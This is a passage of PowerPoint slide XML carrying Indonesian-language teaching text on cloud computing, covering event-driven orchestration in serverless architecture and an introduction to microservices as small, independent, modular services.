            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>orkestrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digerakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>properti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengomit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Logika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>monolitik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Mikro</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modular, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memecahnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menskalakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> individual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
